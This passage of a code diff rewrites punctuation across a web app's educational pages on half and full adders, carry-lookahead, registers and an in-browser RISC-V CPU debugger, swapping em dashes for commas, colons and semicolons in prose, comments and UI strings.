           directly from gates, it&rsquo;s five: two XORs, two ANDs, and one OR. Built from{' '}
-          <code>HalfAdder</code> blocks, it&rsquo;s two half adders feeding into an OR &mdash; same
+          <code>HalfAdder</code> blocks, it&rsquo;s two half adders feeding into an OR, the same
           five gates inside, but the structure now has a name at every level.
         </p>
       </div>

--- a/apps/web/src/features/learn/abstraction/sections/HeroSection.tsx
+++ b/apps/web/src/features/learn/abstraction/sections/HeroSection.tsx
@@ -6,8 +6,8 @@ export function HeroSection() {
           Abstraction
         </h1>
         <p className="mt-6 text-xl text-gray-500 dark:text-gray-300 leading-relaxed">
-          How a cluster of gates becomes a named block you can reuse &mdash; and how the same move
-          scales from a half-adder up to a CPU.
+          How a cluster of gates becomes a named block you can reuse, and how the same move scales
+          from a half-adder up to a CPU.
         </p>
       </div>
     </section>

--- a/apps/web/src/features/learn/abstraction/sections/ScalingSection.tsx
+++ b/apps/web/src/features/learn/abstraction/sections/ScalingSection.tsx
@@ -9,18 +9,18 @@ export function ScalingSection() {
       <h2 className="text-3xl font-bold text-gray-900 dark:text-white mb-4">Why this scales</h2>
       <div className="prose-invert space-y-6">
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
-          Once full adders have a name, building an 8-bit adder is eight nodes chained tail-to-head
-          &mdash; each stage&rsquo;s carry-out feeding the next stage&rsquo;s carry-in. The flat
-          equivalent would have 40+ gates with criss-crossing carry wires. Same behavior, but you
+          Once full adders have a name, building an 8-bit adder is eight nodes chained tail-to-head,
+          each stage&rsquo;s carry-out feeding the next stage&rsquo;s carry-in. The flat equivalent
+          would have 40+ gates with criss-crossing carry wires. Same behavior, but you
           couldn&rsquo;t glance at it and see &ldquo;eight adders in a chain.&rdquo;
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           This is why hardware design works the way it does. Every CPU you have ever used is, at the
           gate level, hundreds of millions of standard cells. Nobody designs CPUs by drawing them.
           They describe <code>FullAdder</code>, then <code>Adder</code>, then <code>ALU</code>, then{' '}
-          <code>Datapath</code>, then <code>Core</code> &mdash; and at each level, the previous
-          level is &ldquo;a node with a name.&rdquo; (Real production CPUs use parallel-prefix
-          adders, not ripple-carry, for speed &mdash; see{' '}
+          <code>Datapath</code>, then <code>Core</code>, and at each level, the previous level is
+          &ldquo;a node with a name.&rdquo; (Real production CPUs use parallel-prefix adders, not
+          ripple-carry, for speed. See{' '}
           <a href="/learn/adders" className="text-blue-600 dark:text-blue-400 hover:underline">
             /learn/adders
           </a>{' '}

--- a/apps/web/src/features/learn/abstraction/sections/TwoWaysSection.tsx
+++ b/apps/web/src/features/learn/abstraction/sections/TwoWaysSection.tsx
@@ -13,28 +13,26 @@ export function TwoWaysSection() {
       </h2>
       <div className="prose-invert space-y-6">
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
-          A half adder is two gates &mdash; an XOR for the sum, an AND for the carry. The version
-          below collapses those two gates into a single labeled <code>HalfAdder</code> node with the
-          same external ports. Both produce identical outputs because they <em>are</em> the same
-          circuit.
+          A half adder is two gates: an XOR for the sum, an AND for the carry. The version below
+          collapses those two gates into a single labeled <code>HalfAdder</code> node with the same
+          external ports. Both produce identical outputs because they <em>are</em> the same circuit.
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
-          That collapse is abstraction. Nothing is hidden &mdash; the gates are still there, doing
-          the same work &mdash; but once a structure has a name, you can stop thinking about its
-          parts.
+          That collapse is abstraction. Nothing is hidden, since the gates are still there doing the
+          same work, but once a structure has a name, you can stop thinking about its parts.
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           In code, the rule is: declaring <code>inputs</code> and/or <code>outputs</code> on a{' '}
           <code>circuit()</code> is what turns it into a block you can drop into another circuit as
-          a node. Without either, you have a self-contained simulation &mdash; runnable on its own
-          but not composable.
+          a node. Without either, you have a self-contained simulation, runnable on its own but not
+          composable.
         </p>
       </div>
 
       <div className="mt-6 grid gap-4 md:grid-cols-2">
         <div className="rounded-lg border border-border bg-card overflow-hidden">
           <div className="px-3 py-1.5 border-b border-border text-[10px] text-muted-foreground font-mono">
-            FlatDemo.ts &mdash; no ports
+            FlatDemo.ts, no ports
           </div>
           <HighlightedCode
             className="px-4 py-3 text-[12px] leading-relaxed overflow-x-auto"
@@ -55,7 +53,7 @@ export function TwoWaysSection() {
         </div>
         <div className="rounded-lg border border-border bg-card overflow-hidden">
           <div className="px-3 py-1.5 border-b border-border text-[10px] text-muted-foreground font-mono">
-            HalfAdder.ts &mdash; composable
+            HalfAdder.ts, composable
           </div>
           <HighlightedCode
             className="px-4 py-3 text-[12px] leading-relaxed overflow-x-auto"

--- a/apps/web/src/features/learn/abstraction/sections/WhenToEncapsulateSection.tsx
+++ b/apps/web/src/features/learn/abstraction/sections/WhenToEncapsulateSection.tsx
@@ -13,8 +13,8 @@ export function WhenToEncapsulateSection() {
           </li>
           <li>
             <strong>It&rsquo;s conceptually one thing.</strong> A half adder isn&rsquo;t &ldquo;an
-            XOR and an AND&rdquo; &mdash; it&rsquo;s an adder. The abstraction matches the level you
-            think at.
+            XOR and an AND&rdquo;; it&rsquo;s an adder. The abstraction matches the level you think
+            at.
           </li>
           <li>
             <strong>It would clutter the parent.</strong> If inlining the cluster would make the
@@ -22,7 +22,7 @@ export function WhenToEncapsulateSection() {
           </li>
         </ul>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
-          The other half of abstraction is <strong>parameterization</strong> &mdash;{' '}
+          The other half of abstraction is <strong>parameterization</strong>:{' '}
           <code>Adder(&#123; width: 8 &#125;)</code> and <code>Adder(&#123; width: 32 &#125;)</code>{' '}
           are the same abstraction specialized differently. One definition, many uses.
         </p>
@@ -30,8 +30,8 @@ export function WhenToEncapsulateSection() {
           This same hierarchy is what <strong>Verilog</strong> and <strong>SystemVerilog</strong>{' '}
           modules express in real chip design. Designers describe modules with named ports,
           parameters, and instances of other modules; a synthesis tool maps that hierarchy down to
-          cells from a foundry library (NAND, NOR, AOI, full adders, flip-flops &mdash; already well
-          above gate level). Nobody, anywhere, is drawing NAND gates by hand.
+          cells from a foundry library (NAND, NOR, AOI, full adders, flip-flops, already well above
+          gate level). Nobody, anywhere, is drawing NAND gates by hand.
         </p>
       </div>
     </section>

--- a/apps/web/src/features/learn/adders/circuits.ts
+++ b/apps/web/src/features/learn/adders/circuits.ts
@@ -6,7 +6,7 @@
  * in a ripple-carry configuration to make the depth problem visible.
  *
  * HalfAdder, FullAdder and RippleCarryDemo are real. DepthDemo and
- * CarryLookaheadDemo are still stubs aliased to RippleCarryDemo — see the
+ * CarryLookaheadDemo are still stubs aliased to RippleCarryDemo; see the
  * TODOs on each.
  */
 
@@ -58,7 +58,7 @@ export const FullAdder = circuit('FullAdder', {
 // depth this section is about would be invisible. Wiring the chain by hand
 // makes the schematic elongate, which is the whole point.
 //
-// The Slice/Concat nodes are not gates — they are how this IR spells "take
+// The Slice/Concat nodes are not gates; they are how this IR spells "take
 // bit i of a bus" and "put these bits back together", because a Connection
 // addresses a port, not a bit within one.
 const RippleCarryDemo = circuit('RippleCarry8', {
@@ -109,7 +109,7 @@ export const ADDER_CIRCUITS = {
   // halfAdder / fullAdder used to live here as standalone Demo wrappers.
   // The half-adder and full-adder sections now drive HalfAdder / FullAdder
   // directly via useCircuitSimulator + autoHarness, so those entries are
-  // gone — the bare circuits are exported above for that composition.
+  // gone; the bare circuits are exported above for that composition.
   rippleCarry: {
     name: '8-bit ripple-carry adder',
     description:
@@ -119,7 +119,7 @@ export const ADDER_CIRCUITS = {
   depth: {
     name: 'The critical path',
     description:
-      'The longest path from any input to any output — the depth that bounds clock speed.',
+      'The longest path from any input to any output, the depth that bounds clock speed.',
     circuit: DepthDemo,
   },
   carryLookahead: {

--- a/apps/web/src/features/learn/adders/sections/CarryLookaheadSection.tsx
+++ b/apps/web/src/features/learn/adders/sections/CarryLookaheadSection.tsx
@@ -10,7 +10,7 @@ export function CarryLookaheadSection() {
         Carry-lookahead: faster addition through parallelism
       </h2>
       <div className="prose-invert space-y-6">
-        {/* TODO: prose — explain generate (g = a AND b) and propagate
+        {/* TODO: prose, explain generate (g = a AND b) and propagate
             (p = a XOR b), then how every carry can be derived in parallel
             from g and p without waiting for prior stages. */}
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
@@ -18,23 +18,23 @@ export function CarryLookaheadSection() {
           <strong>generate</strong> (<code>g_i = a_i AND b_i</code>, this stage definitely produces
           a carry) and <strong>propagate</strong> (<code>p_i = a_i XOR b_i</code>, this stage will
           pass through whatever carry it receives). With those, every carry can be computed in terms
-          of every prior <code>g</code> and <code>p</code> at once &mdash; no ripple required.
+          of every prior <code>g</code> and <code>p</code> at once, with no ripple required.
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           &ldquo;Carry-lookahead&rdquo; is really a <em>family</em> of designs that share this idea,
           at different points on a depth/area tradeoff curve. <strong>Single-level CLA</strong>{' '}
-          groups bits into chunks of k (typically 4) and gets depth proportional to <code>n/k</code>{' '}
-          &mdash; faster than ripple, but still linear. <strong>Multi-level CLA</strong> applies the
+          groups bits into chunks of k (typically 4) and gets depth proportional to <code>n/k</code>
+          , faster than ripple, but still linear. <strong>Multi-level CLA</strong> applies the
           lookahead idea recursively across groups. And <strong>parallel-prefix</strong> networks
-          &mdash; Kogge-Stone, Brent-Kung, Han-Carlson &mdash; arrange the g/p combinations as a
-          tree, achieving true O(log n) depth.
+          (Kogge-Stone, Brent-Kung, Han-Carlson) arrange the g/p combinations as a tree, achieving
+          true O(log n) depth.
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           For a 32-bit adder, a parallel-prefix structure means depth ~5 instead of depth 32.
           That&rsquo;s the actual reason a real CPU can add two 64-bit numbers in a single clock
-          cycle &mdash; every modern ALU you have ever used is some variant of this family. The
-          naive ripple-carry from earlier in this page is correct, but it&rsquo;s not what&rsquo;s
-          sitting inside your laptop.
+          cycle: every modern ALU you have ever used is some variant of this family. The naive
+          ripple-carry from earlier in this page is correct, but it&rsquo;s not what&rsquo;s sitting
+          inside your laptop.
         </p>
       </div>
 

--- a/apps/web/src/features/learn/adders/sections/DepthSection.tsx
+++ b/apps/web/src/features/learn/adders/sections/DepthSection.tsx
@@ -10,23 +10,21 @@ export function DepthSection() {
         Why ripple-carry is slow
       </h2>
       <div className="prose-invert space-y-6">
-        {/* TODO: prose — this is the load-bearing section. Make the depth
+        {/* TODO: prose, this is the load-bearing section. Make the depth
             argument concrete. Show that the high-bit's sum can't settle until
             every prior carry has propagated. Walk through what determines
             clock speed (longest combinational path) and why an N-bit
             ripple-carry adder has depth proportional to N. */}
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           Every gate takes some real, physical time to switch. The clock speed of a chip is bounded
-          by the <strong>longest combinational path</strong> between any two registers &mdash;
-          whatever signal has to travel farthest sets the upper limit on how fast the clock can
-          tick.
+          by the <strong>longest combinational path</strong> between any two registers, whatever
+          signal has to travel farthest sets the upper limit on how fast the clock can tick.
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           In a ripple-carry adder, the high-bit's sum can't settle until the carry has propagated
           all the way from bit 0 through every intermediate stage. An 8-bit adder needs the carry to
           traverse eight full-adders before the answer is valid. A 64-bit adder needs 64. Depth
-          grows linearly with width &mdash; a problem that gets worse exactly as your inputs get
-          wider.
+          grows linearly with width, a problem that gets worse exactly as your inputs get wider.
         </p>
       </div>
 

--- a/apps/web/src/features/learn/adders/sections/FullAdderSection.tsx
+++ b/apps/web/src/features/learn/adders/sections/FullAdderSection.tsx
@@ -46,8 +46,8 @@ export function FullAdderSection() {
           half-adder can produce a carry, and the full adder's carry-out is the OR of both.
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
-          Try all eight combinations &mdash; the result is the binary encoding of how many of the
-          three inputs are 1.
+          Try all eight combinations: the result is the binary encoding of how many of the three
+          inputs are 1.
         </p>
       </div>
 
@@ -56,7 +56,7 @@ export function FullAdderSection() {
           <CircuitEmbed
             circuit={FullAdder}
             title="Full adder"
-            description="Adds three bits — a, b, and carry-in — to one sum bit and one carry-out."
+            description="Adds three bits (a, b, and carry-in) to one sum bit and one carry-out."
             onPortValuesChange={setPortValues}
           />
         </div>

--- a/apps/web/src/features/learn/adders/sections/HalfAdderSection.tsx
+++ b/apps/web/src/features/learn/adders/sections/HalfAdderSection.tsx
@@ -33,8 +33,8 @@ export function HalfAdderSection() {
       <div className="prose-invert space-y-6">
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           The smallest possible adder takes two bits and produces two bits: a <strong>sum</strong>{' '}
-          and a <strong>carry</strong>. With two single-bit inputs there are four cases &mdash; the
-          sum is 1 when exactly one input is 1 (that&rsquo;s XOR), and the carry is 1 only when both
+          and a <strong>carry</strong>. With two single-bit inputs there are four cases, and the sum
+          is 1 when exactly one input is 1 (that&rsquo;s XOR), and the carry is 1 only when both
           inputs are 1 (that&rsquo;s AND).
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">

--- a/apps/web/src/features/learn/adders/sections/HeroSection.tsx
+++ b/apps/web/src/features/learn/adders/sections/HeroSection.tsx
@@ -7,11 +7,11 @@ export function HeroSection() {
         </h1>
         <p className="mt-6 text-xl text-gray-500 dark:text-gray-300 leading-relaxed">
           {/* TODO: one-sentence concept definition. Something like:
-              "How digital circuits add two numbers — starting from a single XOR
+              "How digital circuits add two numbers, starting from a single XOR
               gate, ending with why the obvious design gets slower the wider
               your inputs are." */}
-          How digital circuits add two numbers &mdash; starting from a single XOR gate, ending with
-          why the obvious design gets slower the wider your inputs are.
+          How digital circuits add two numbers, starting from a single XOR gate, ending with why the
+          obvious design gets slower the wider your inputs are.
         </p>
       </div>
     </section>

--- a/apps/web/src/features/learn/adders/sections/RippleCarrySection.tsx
+++ b/apps/web/src/features/learn/adders/sections/RippleCarrySection.tsx
@@ -18,9 +18,9 @@ export function RippleCarrySection() {
           the low bit to the high bit, one stage at a time.
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
-          Change the inputs below and watch the result. It works correctly for every pair of values
-          &mdash; addition is addition. But there's a subtle cost to this structure that doesn't
-          show up in any single-cycle simulation.
+          Change the inputs below and watch the result. It works correctly for every pair of values;
+          addition is addition. But there's a subtle cost to this structure that doesn't show up in
+          any single-cycle simulation.
         </p>
       </div>
 

--- a/apps/web/src/features/learn/cpu-debugger/CPUDebugger.tsx
+++ b/apps/web/src/features/learn/cpu-debugger/CPUDebugger.tsx
@@ -19,7 +19,7 @@ const LANGUAGES = [
 ] as const;
 
 const STARTER: Record<string, string> = {
-  c: `// Fibonacci sequence — computes the 10th number.
+  c: `// Fibonacci sequence: computes the 10th number.
 // When done, register a0 = 55 (0x00000037).
 int main() {
     int a = 0;
@@ -31,7 +31,7 @@ int main() {
     }
     return a; // a0 = 55 (0x37)
 }`,
-  cpp: `// Fibonacci sequence — computes the 10th number.
+  cpp: `// Fibonacci sequence: computes the 10th number.
 // When done, register a0 = 55 (0x00000037).
 int main() {
     int a = 0, b = 1;
@@ -52,7 +52,7 @@ _start:
     add a0, a0, a1 # a0 = a0 + a1 = 7 (0x07)
     li a7, 93
     ecall`,
-  rust: `// Bare-metal Rust — no OS, no stdlib.
+  rust: `// Bare-metal Rust: no OS, no stdlib.
 // This runs directly on the CPU hardware.
 // When done, register a0 = 55 (0x00000037).
 #![no_std]
@@ -93,7 +93,7 @@ const PIPELINE_DESCRIPTIONS: Record<
   EX: {
     label: 'Compute',
     title: 'Execute',
-    desc: 'The ALU performs the computation — arithmetic, logic, or address calculation.',
+    desc: 'The ALU performs the computation: arithmetic, logic, or address calculation.',
   },
   MEM: {
     label: 'Memory',
@@ -133,7 +133,7 @@ function describeCurrentCycle(
 
   const parts: string[] = [];
 
-  // Describe EX stage — this is where computation happens
+  // Describe EX stage; this is where computation happens
   if (stages.EX != null) {
     const line = disasmLines.find((l) => l.address === stages.EX && l.instruction);
     if (line) {
@@ -161,9 +161,9 @@ function describeCurrentCycle(
   if (parts.length === 0) {
     // Pipeline is filling or flushing
     const activeCount = Object.values(stages).filter((v) => v != null).length;
-    if (activeCount === 0) return 'Pipeline is empty — all instructions have completed.';
+    if (activeCount === 0) return 'Pipeline is empty; all instructions have completed.';
     if (activeCount < 5)
-      return 'Pipeline is filling — instructions flow through one stage per cycle.';
+      return 'Pipeline is filling; instructions flow through one stage per cycle.';
     return null;
   }
 
@@ -361,19 +361,19 @@ export function CPUDebugger() {
 
   return (
     <div className="flex h-full flex-col bg-gray-950 text-gray-100 overflow-hidden">
-      {/* Intro banner — shown before first compile */}
+      {/* Intro banner, shown before first compile */}
       {!compiled && !compiling && (
         <div className="shrink-0 border-b border-blue-900/30 bg-blue-950/20 px-4 py-3">
           <p className="text-sm text-blue-200/90">
-            <span className="font-semibold text-blue-100">This is a real CPU</span> &mdash; built
-            from registers, ALUs, muxes, and memory, simulated cycle by cycle in your browser. Write
-            code in C, C++, Rust, or assembly, compile it, then step through each clock cycle and
-            watch instructions flow through the pipeline.
+            <span className="font-semibold text-blue-100">This is a real CPU</span>, built from
+            registers, ALUs, muxes, and memory, simulated cycle by cycle in your browser. Write code
+            in C, C++, Rust, or assembly, compile it, then step through each clock cycle and watch
+            instructions flow through the pipeline.
           </p>
         </div>
       )}
 
-      {/* Top bar — SiteHeader (brand on left) + tool controls in the right slot */}
+      {/* Top bar: SiteHeader (brand on left) + tool controls in the right slot */}
       <SiteHeader
         sticky={false}
         right={
@@ -410,7 +410,7 @@ export function CPUDebugger() {
               {compiling ? 'Compiling…' : 'Compile'}
             </button>
 
-            {/* Simulator controls — only when loaded */}
+            {/* Simulator controls, only when loaded */}
             {sim.ready && (
               <>
                 <div className="h-4 w-px bg-border" />
@@ -456,11 +456,11 @@ export function CPUDebugger() {
         }
       />
 
-      {/* Main content — two outer columns: [code + pipeline + disassembly] | [registers] */}
+      {/* Main content: two outer columns: [code + pipeline + disassembly] | [registers] */}
       <div className="flex flex-1 overflow-hidden">
-        {/* Left+middle group — pipeline on top, code|disassembly below */}
+        {/* Left+middle group: pipeline on top, code|disassembly below */}
         <div className="flex flex-1 flex-col overflow-hidden border-r border-gray-800">
-          {/* Pipeline stages — spans full width of this group (not over registers) */}
+          {/* Pipeline stages, spans full width of this group (not over registers) */}
           <div className="shrink-0 border-b border-gray-800 px-3 py-2">
             <div className="mb-1.5 text-[10px] font-semibold uppercase tracking-widest text-gray-600">
               Pipeline
@@ -542,7 +542,7 @@ export function CPUDebugger() {
           </div>
         </div>
 
-        {/* Right column — registers, full height */}
+        {/* Right column: registers, full height */}
         <div className="flex w-[300px] shrink-0 flex-col overflow-hidden">
           <div className="shrink-0 border-b border-gray-800 px-4 py-1.5 text-[10px] font-semibold uppercase tracking-widest text-gray-600">
             Registers

--- a/apps/web/src/features/learn/cpu-debugger/RV32IDebuggerPreview.tsx
+++ b/apps/web/src/features/learn/cpu-debugger/RV32IDebuggerPreview.tsx
@@ -1,14 +1,14 @@
 /**
  * Choreographed RV32I CPU debugger teaser for the landing page.
  *
- * Not the real simulator (that lives at /cpu/rv32i) — a lightweight, canned
+ * Not the real simulator (that lives at /cpu/rv32i), just a lightweight canned
  * loop that tells a legible 3-act story so a visitor understands what they're
  * seeing without CPU knowledge:
- *   1. Compile  — Rust → RISC-V (spinner beat)
- *   2. Execute  — instructions step through the 5-stage pipeline; the active
+ *   1. Compile  : Rust → RISC-V (spinner beat)
+ *   2. Execute  : instructions step through the 5-stage pipeline; the active
  *                 disassembly line advances; a plain-English narration line
  *                 says what each instruction does
- *   3. Result   — the payoff: a0 = 55
+ *   3. Result   : the payoff, a0 = 55
  * No Monaco, no simulator hook. Responsive: desktop shows the full debugger
  * (pipeline + Rust source beside the disassembly); mobile drops the source.
  */
@@ -33,23 +33,23 @@ const STAGE_META: { key: StageKey; label: string; desc: string }[] = [
   {
     key: 'IF',
     label: 'Fetch',
-    desc: 'Instruction Fetch — read the next instruction word from memory at the program counter.',
+    desc: 'Instruction Fetch: read the next instruction word from memory at the program counter.',
   },
   {
     key: 'ID',
     label: 'Decode',
-    desc: 'Instruction Decode — split the instruction into opcode, register operands, and immediate; read source registers.',
+    desc: 'Instruction Decode: split the instruction into opcode, register operands, and immediate; read source registers.',
   },
   {
     key: 'EX',
     label: 'Execute',
-    desc: 'Execute — the ALU computes results, branches evaluate, and memory addresses are calculated.',
+    desc: 'Execute: the ALU computes results, branches evaluate, and memory addresses are calculated.',
   },
-  { key: 'MEM', label: 'Memory', desc: 'Memory Access — load from or store to data memory.' },
+  { key: 'MEM', label: 'Memory', desc: 'Memory Access: load from or store to data memory.' },
   {
     key: 'WB',
     label: 'Save',
-    desc: 'Write Back — write the result into the destination register.',
+    desc: 'Write Back: write the result into the destination register.',
   },
 ];
 
@@ -75,13 +75,13 @@ const DISASM: DisasmRow[] = [
   { kind: 'instr', addr: '0000000c', text: 'j c <_start+0xc>', note: 'Loop' },
   { kind: 'label', text: '<main>:' },
   { kind: 'instr', addr: '00000010', text: 'li a0,55', note: 'Load the value 55 into register a0' },
-  { kind: 'instr', addr: '00000014', text: 'ret', note: 'Return — a0 holds the result' },
+  { kind: 'instr', addr: '00000014', text: 'ret', note: 'Return, a0 holds the result' },
 ];
 
 // Execution order: DISASM indices of the instructions actually run, in order.
 const EXEC = [1, 2, 3, 6, 7];
 
-const RUST_SOURCE = `// Bare-metal Rust — no OS, no stdlib.
+const RUST_SOURCE = `// Bare-metal Rust: no OS, no stdlib.
 // This runs directly on the CPU hardware.
 // When done, register a0 = 55 (0x00000037).
 #![no_std]
@@ -130,7 +130,7 @@ export function RV32IDebuggerPreview() {
   const rootRef = useRef<HTMLDivElement>(null);
 
   // Only run while the demo is on screen, and restart the story from act 1
-  // each time it scrolls into view — so a visitor always catches the full
+  // each time it scrolls into view, so a visitor always catches the full
   // compile → execute → result arc rather than landing mid-cycle.
   useEffect(() => {
     const el = rootRef.current;
@@ -178,7 +178,7 @@ export function RV32IDebuggerPreview() {
     phase === 'compiling'
       ? { node: <Spinner />, text: 'Compiling Rust to RISC-V…' }
       : phase === 'done'
-        ? { node: <span className="text-emerald-500">✓</span>, text: 'Done — a0 = 55 (0x00000037)' }
+        ? { node: <span className="text-emerald-500">✓</span>, text: 'Done: a0 = 55 (0x00000037)' }
         : { node: <span className="text-blue-500">▸</span>, text: instrAt(EXEC[step]).note };
 
   return (
@@ -214,7 +214,7 @@ export function RV32IDebuggerPreview() {
               </Tooltip>
             ))}
           </div>
-          {/* Narration line — plain English, what's happening right now */}
+          {/* Narration line: plain English, what's happening right now */}
           <p className="mt-3 flex items-center gap-2 text-[13px] text-muted-foreground/90 leading-snug">
             {narration.node}
             <span>{narration.text}</span>
@@ -244,7 +244,7 @@ export function RV32IDebuggerPreview() {
 
         {/* ---- Body: source (desktop only) + disassembly / compile spinner ---- */}
         <div className="flex-1 grid grid-cols-1 sm:grid-cols-[3fr_2fr] gap-px bg-border/40 sm:mt-2 overflow-hidden">
-          {/* Rust source — desktop only */}
+          {/* Rust source, desktop only */}
           <div className="hidden sm:block bg-card overflow-hidden">
             <div className="flex font-mono text-[12px] leading-6">
               <div className="px-3 py-2 text-right text-muted-foreground/40 tabular-nums shrink-0 select-none">
@@ -259,7 +259,7 @@ export function RV32IDebuggerPreview() {
             </div>
           </div>
 
-          {/* Disassembly — or the compile spinner during act 1 */}
+          {/* Disassembly, or the compile spinner during act 1 */}
           <div className="bg-card overflow-hidden min-h-[180px]">
             <div className="px-4 pt-2 pb-1.5 text-[10px] font-mono uppercase tracking-wider text-muted-foreground/60">
               Disassembly

--- a/apps/web/src/features/learn/cpu-debugger/rv32i-cpu.circuit.ts
+++ b/apps/web/src/features/learn/cpu-debugger/rv32i-cpu.circuit.ts
@@ -11,12 +11,12 @@ import {
 
 // Debugger board: the canonical pipelined CPU (`RV32I_Core`) plus the memory and
 // memory-mapped peripherals the debugger UI needs. `debug: true` exposes:
-//   • a JTAG-style register scan port — the UI cycles `debug_addr` 0..31 and
+//   • a JTAG-style register scan port; the UI cycles `debug_addr` 0..31 and
 //     samples `debug_value` to build the register view;
 //   • the five pipeline-stage PCs (`if_pc/id_pc/ex_pc/mem_pc4/wb_pc4`) as outputs,
 //     read by useRV32IDebugger for the IF/ID/EX/MEM/WB view (MEM/WB are PC+4).
-// All synthesizable. The CPU's own `net_*` ports are vestigial — real networking
-// is the `nic` peripheral on the bus — so they're tied off.
+// All synthesizable. The CPU's own `net_*` ports are vestigial (real networking
+// is the `nic` peripheral on the bus) so they're tied off.
 export const RV32I_CPU = circuit('RV32I_CPU', {
   inputs: { net_rx_data: bus(32), net_rx_valid: bit, net_rx_frame: bit, debug_addr: bus(5) },
   outputs: {

--- a/apps/web/src/features/learn/cpu-debugger/rv32i-explain.ts
+++ b/apps/web/src/features/learn/cpu-debugger/rv32i-explain.ts
@@ -8,7 +8,7 @@ import { ABI_NAMES } from './useRV32IDebugger';
 
 /** Format a register name nicely, e.g. "a0", "sp", "zero" */
 function reg(r: string): string {
-  // Already an ABI name (a0, sp, ra, etc.) — just return it
+  // Already an ABI name (a0, sp, ra, etc.), so just return it
   // In case of x0-x31 numeric form, convert
   const numMatch = r.match(/^x(\d+)$/);
   if (numMatch) {
@@ -48,12 +48,12 @@ export function explainInstruction(instruction: string): string | null {
 
 // No-operand instructions
 const NOARG: Record<string, string> = {
-  ret: 'Return from function — jump to the address in ra (return address register).',
-  nop: 'No operation — does nothing for one cycle.',
-  ecall: 'Environment call — requests a service from the operating system.',
-  ebreak: 'Breakpoint — transfers control to the debugger.',
-  fence: 'Memory fence — ensures all memory operations before this complete before those after.',
-  wfi: 'Wait for interrupt — halts the CPU until an interrupt occurs.',
+  ret: 'Return from function: jump to the address in ra (return address register).',
+  nop: 'No operation; does nothing for one cycle.',
+  ecall: 'Environment call: requests a service from the operating system.',
+  ebreak: 'Breakpoint: transfers control to the debugger.',
+  fence: 'Memory fence: ensures all memory operations before this complete before those after.',
+  wfi: 'Wait for interrupt: halts the CPU until an interrupt occurs.',
 };
 
 type Handler = (mnemonic: string, o: string[]) => string;
@@ -151,8 +151,8 @@ const HANDLERS: Record<string, Handler> = {
   jalr: (_, o) => `Jump and link register: set ${reg(o[0])} = PC+4, then jump to ${o[1]}.`,
   j: (_, o) => `Jump: unconditionally jump to ${addr(o[0])}.`,
   jr: (_, o) => `Jump register: jump to the address in ${reg(o[0])}.`,
-  call: (_, o) => `Call function at ${addr(o[0])} — saves return address in ra.`,
-  tail: (_, o) => `Tail call to ${addr(o[0])} — does not save a return address.`,
+  call: (_, o) => `Call function at ${addr(o[0])}, saving the return address in ra.`,
+  tail: (_, o) => `Tail call to ${addr(o[0])}, which does not save a return address.`,
 
   // --- Upper immediates ---
   lui: (_, o) => `Load upper immediate: set ${reg(o[0])} = ${o[1]} shifted left 12 bits.`,
@@ -163,6 +163,6 @@ const HANDLERS: Record<string, Handler> = {
 function findPrefixHandler(mnemonic: string): Handler | null {
   // Handle fence.i, etc.
   if (mnemonic.startsWith('fence'))
-    return () => 'Memory fence — enforces ordering of memory operations.';
+    return () => 'Memory fence: enforces ordering of memory operations.';
   return null;
 }

--- a/apps/web/src/features/learn/cpu-debugger/useRV32IDebugger.ts
+++ b/apps/web/src/features/learn/cpu-debugger/useRV32IDebugger.ts
@@ -179,7 +179,7 @@ export function useRV32IDebugger() {
     sim.reset();
   }, [sim.reset]);
 
-  // Pipeline-stage PCs read from RV32I_Core's debug outputs (top-level ports) —
+  // Pipeline-stage PCs read from RV32I_Core's debug outputs (top-level ports),
   // the pipeline registers now live inside the `cpu` sub-node, so we no longer
   // reach internal node labels. MEM/WB outputs are PC+4 of the in-flight
   // instruction; subtract 4 to recover the stage PC.
@@ -199,7 +199,7 @@ export function useRV32IDebugger() {
 
   // Scan the regfile via the JTAG-style debug port in one sandbox round-trip.
   // The sandbox loops debug_addr 0..31 internally and returns all values at
-  // once — avoids a 32× round-trip race during Run mode. Models how real
+  // once, which avoids a 32× round-trip race during Run mode. Models how real
   // debug hardware (RV Debug Abstract Commands, ARM CoreSight) reads
   // architectural state while the core is halted.
   const [registers, setRegisters] = useState<Map<number, number>>(new Map());

--- a/apps/web/src/features/learn/registers/circuits.ts
+++ b/apps/web/src/features/learn/registers/circuits.ts
@@ -1,7 +1,7 @@
 /**
  * Circuit definitions for the "Registers" learn page.
  *
- * DFlipFlop and Register come straight from the stdlib — they're already
+ * DFlipFlop and Register come straight from the stdlib; they're already
  * the primitives the page is teaching, so we use them directly via the
  * embed's auto-harness rather than wrapping them. The Counter circuit
  * does need a definition because it's a feedback composition (Register

--- a/apps/web/src/features/learn/registers/sections/CounterSection.tsx
+++ b/apps/web/src/features/learn/registers/sections/CounterSection.tsx
@@ -9,16 +9,16 @@ export function CounterSection() {
       </h2>
       <div className="prose-invert space-y-6">
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
-          Once you have a register, you can wire its output back to its own input &mdash; through
-          some logic that transforms the value on the way. The simplest version: pipe the
+          Once you have a register, you can wire its output back to its own input, through some
+          logic that transforms the value on the way. The simplest version: pipe the
           register&rsquo;s <code>q</code> through an adder that adds 1, and feed the sum back into{' '}
           <code>data</code>. Hold <code>we</code> high so the new value gets captured on every tick.
           The result is a counter: each clock tick advances the stored value by one.
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           This is the basic shape of every CPU program counter, every frequency divider, every state
-          machine&rsquo;s state register &mdash; a register, plus combinational logic that decides
-          what its next value should be, with the result looping back through itself.
+          machine&rsquo;s state register: a register, plus combinational logic that decides what its
+          next value should be, with the result looping back through itself.
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
